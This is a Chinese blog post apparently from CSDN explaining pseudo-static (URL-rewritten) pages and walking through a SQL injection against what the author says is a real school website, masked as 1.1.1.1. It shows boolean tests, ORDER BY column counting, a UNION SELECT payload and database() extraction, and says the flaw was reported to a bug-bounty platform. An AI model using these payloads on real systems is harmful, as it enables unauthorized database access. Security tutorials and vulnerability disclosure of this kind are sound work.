伪静态的sql注入

最新推荐文章于 2024-08-23 16:41:03 发布
最新推荐文章于 2024-08-23 16:41:03 发布
阅读量3k 收藏 9
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/108654640
版权

伪静态是什么

在这里插入图片描述

伪静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了伪静态技术。伪静态技术是指展示出来的是以html一类的静态页面形式,但其实是用ASP一类的动态脚本来处理的。
在这里插入图片描述

伪静态验证

既然,我们了解什么是伪静态后,那么我们怎么判断一个网站是静态还是伪静态的呢?
首先我们可以根据网站最后的修改时间来判断一个网站是否为伪静态,那么我们演示一下:

javascript:alert(document.lastModified)

网站的首页

在这里插入图片描述
f12一下,然后输入上方的命令

在这里插入图片描述
回车弹框时间,然后等几秒再来一次,查看时间是否和上次的相同,如果相同就证明是静态的,如果时间和上次不同,则是伪静态的网站。

在这里插入图片描述

注入流程

其实伪静态的站和平常的注入是一样的,接下来就走一下流程!由于不能发出来,所以这里用1.1.1.1代替

网址:https://1.1.1.1/id/1

在这里插入图片描述

https://1.1.1.1/id/1) and 1=1 -- a正确
https://1.1.1.1/id/1) and 1=2 -- a错误

继续判断字段数,发现为6

https://1.1.1.1/id/1) order by 7 -- a 错误
https://1.1.1.1/id/1) order by 6 -- a 正确

然后查看输出点在那个显位

https://1.1.1.1/id/-1) union select 1,2,3,4,5,6 -- a

在这里插入图片描述

可以看到显位是3、4、5然后我们在3的显位输入database()

在这里插入图片描述

然后用御剑跑了一下后台,很幸运的跑到了,但是这里主要是伪静态所以不测试了,直接放弃

在这里插入图片描述

总结

因为是个学校的站,所以本来打算交到edu的,但是提个高危漏洞+1个金币可以白嫖月饼,所以果断提交到盒子。
交流学习QQ:3075999532
微信公众号:
在这里插入图片描述

p_utao
关注
专栏目录
【漏洞挖掘】——25、XXE靶机实践测试
Fly_鹏程万里
03-08 8609
Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络中的漏洞,我们希望你喜欢这个挑战!
SQL注入之——伪静态注入
weixin_41657031的博客
07-15 2330
1.什么是伪静态注入? 答:“伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。展示出来的是以html一类的静态页面形式,但其实是用PHP一类的动态脚本来处理的。 2....
干货!一次伪静态页面的SQL注入!白帽黑客实战 。
m0_60571990的博客
11-22 827
干货!一次伪静态页面的SQL注入!白帽黑客实战 。
漏洞挖掘 | 记一次伪静态页面的SQL注入
最新发布
2301_80115097的博客
08-23 504
在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload多尝试,多总结祝各位师兄们也都收获满满~~!
伪静态注入
cnbird's blog
06-01 5327
伪静态注入
sql注入之mysql数据库 sqlmap工具 伪静态注入 注入防御
weixin_46476861的博客
03-03 2889
python2和python3互不兼容,SqlMap是基于python2的,用2.7或之前的,所以SqlMap不支持python3 -u –level –risk -v 在包里参数进行测试语句 -m –mobile app通过抓包能得到url,但是不能在电脑地址栏里转到,所以需要模拟手机 -batch-smart 注入过程不需要在选择y或者n ctrl+c取消暴力破解 -r -p -threads 数据库外围命令
SQL注入防御之一——伪静态(PHP)
心有猛虎,细嗅蔷薇!
08-22 2897
伪静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了伪静态技术。就是展示出来的是以html一类的静态页面形式,但其实是用PHP一类的动态脚本来处理的。。 概述 众所周知,web安全防御一直
伪静态sql注入sqlmap
09-20
伪静态SQL注入是指在伪静态页面中通过注入恶意的SQL语句来获取或修改数据库中的信息。与真实的静态页面不同,伪静态页面是通过服务器脚本将动态内容转化为静态的HTML页面。在注入防御方面,PDO(PHP Data Object)...
PHP针对伪静态的注入总结【附asp与Python相关代码】
10-19
中转注入法是一种利用了伪静态规则将注入点隐藏起来,通过间接的方式来实现SQL注入的技术。攻击者可能会利用这种间接注入方法,从而绕过网站的安全防护措施。 PHP代码片段中提供了一个中转注入的示例。在这个例子中...
伪静态注入中转突破伪静态
07-24
然而,这种技术也带来了一定的安全隐患,因为伪静态URL结构使得传统SQL注入攻击手段变得更为复杂。本文将详细介绍如何通过中转页面实现对伪静态网站的SQL注入。 首先,理解伪静态的原理。传统的动态URL,如`...
伪静态注入中转
10-06
伪静态注入中转PHP版本 土司出品 方便大家测试使用
【转载】伪静态SQL注入
08-27 258
伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规的伪静态页面如下:http://www.2cto.com /play/Diablo.html, 在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多。 例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成...
伪静态的注入
afei001
06-25 1978
伪静态伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。 伪静态网站 如果看到一个以.html或者.htm结尾的网页,此时可以通过在地址输入框中输入:javascript:alert(document.lastMod...
sql 时间相减_SQL注入伪静态注入
weixin_39922642的博客
12-09 175
一、伪静态介绍0x01 什么是伪静态页面 "伪静态"顾名思义就是一种表面上看似是静态网页(比如以.html、.htm等结尾),看似不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页被称为伪静态网页。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。0x02 伪静态页面原理对于很多网站来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值